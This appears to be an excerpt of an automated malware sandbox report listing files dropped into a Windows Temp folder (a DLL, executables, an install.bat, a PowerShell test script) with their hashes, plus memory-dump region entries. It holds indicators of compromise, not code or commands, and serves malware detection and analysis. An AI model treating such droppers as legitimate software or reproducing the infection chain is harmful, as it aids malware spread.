C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll
| MD5 | 544cd51a596619b78e9b54b70088307d |
| SHA1 | 4769ddd2dbc1dc44b758964ed0bd231b85880b65 |
| SHA256 | dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd |
| SHA512 | f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719 |
memory/1332-48-0x0000000005270000-0x0000000005280000-memory.dmp
memory/1332-49-0x0000000005270000-0x0000000005280000-memory.dmp
memory/1332-50-0x0000000005490000-0x00000000054A0000-memory.dmp
memory/1332-51-0x0000000005270000-0x0000000005280000-memory.dmp
memory/2668-52-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/1332-53-0x0000000007670000-0x0000000007770000-memory.dmp
memory/1332-54-0x0000000005270000-0x0000000005280000-memory.dmp
memory/1332-55-0x0000000005270000-0x0000000005280000-memory.dmp
memory/1332-58-0x0000000007670000-0x0000000007770000-memory.dmp
memory/912-57-0x0000000000400000-0x000000000043C000-memory.dmp
memory/1332-60-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/2668-62-0x0000000005020000-0x0000000005030000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5560.exe
| MD5 | 72f53d07eacfa5ddd766373d594e6f7c |
| SHA1 | 23e619c97aae6629c95ebafccbaf76654778b026 |
| SHA256 | 9d199680a2e9ae61237bad15275ab2f726a48cb1c2664daf9047c0f6cae001a3 |
| SHA512 | b08f27e23160164f3966e924142d818435f9ddc8d900c592920ef503f584c9b875820f081f4b5e19a366209e84dcbd83139a10ae3fd8a212a42ddc0d7736b5eb |
memory/912-66-0x00000000743F0000-0x0000000074BA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5560.exe
| MD5 | c22c9ad3f48a18c6c751616647432e08 |
| SHA1 | 25c4db1953394e8fa347a41bfd204e9c55d1d9b5 |
| SHA256 | 93c39c83a46b36099f42fe7d2104893bb1f8310adf2bfd4c435cf61617aafa00 |
| SHA512 | 0e02dc28ebb8b14ba02fc46842206ce7df03d26297e31022eb034fdd15b9b196f695f0ac8107652df4c148b703f3a0a50a64a7fa75f3c6bbd0d3574548a4e907 |
memory/1332-64-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/3680-67-0x00000000743F0000-0x0000000074BA0000-memory.dmp
memory/3680-69-0x0000000000A60000-0x0000000001852000-memory.dmp
memory/912-68-0x0000000007610000-0x0000000007620000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5D70.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat
| MD5 | 60c9624e093baac4bef11ab4fc846111 |
| SHA1 | 07a25911c81e04608a0dc6fb065524a9da82dd65 |
| SHA256 | e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d |
| SHA512 | 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24 |
memory/2668-79-0x00000000743F0000-0x0000000074BA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | c6c53c63657293e4da62c4e7f1d1831b |
| SHA1 | a8379d445fb2226da97418f4d75bad07ef9290ca |
| SHA256 | 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf |
| SHA512 | 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965 |
memory/1664-89-0x0000022250250000-0x0000022250272000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arf4sfvq.acs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1664-94-0x00007FF9115E0000-0x00007FF9120A1000-memory.dmp
memory/1664-95-0x00000222501D0000-0x00000222501E0000-memory.dmp
memory/1664-96-0x00000222501D0000-0x00000222501E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
| MD5 | e6aac0b1ad7d4f59cb73e4c44faf80b2 |
| SHA1 | d7d27ef23f2c315fe0e886b3f3f20bc06b89796e |
| SHA256 | fd1691e6e9f071a862b162a940665be3192ef6c01607b75da76edc88d3f1e02c |
| SHA512 | 91b32b9596009b4486ea5f8140fb2615ade3058b54e8760913298ca437c7f825787bb23a93819d206ad481178d83f998fb9abe9627b46d0c309d54ff0260e17d |